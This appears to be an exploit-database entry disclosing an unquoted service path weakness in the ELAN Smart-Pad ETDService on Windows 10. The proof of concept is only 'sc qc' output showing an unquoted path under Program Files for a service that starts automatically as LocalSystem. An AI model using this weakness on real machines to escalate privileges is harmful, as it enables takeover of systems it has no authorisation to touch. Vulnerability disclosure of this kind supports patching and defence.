Elan smartpad 11.10.15.1 etdservice unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-02-06 | Type : local | Platform : windows


[+] Code ...

#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-02-05
#Vendor : ELAN Microelectronics
#Vendor Homepage : http://www.emc.com.tw/
#Tested on OS: Windows 10 v1803


#Analyze PoC :
==============


C:\Users\ZwX>sc qc ETDService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ETDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Elan Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem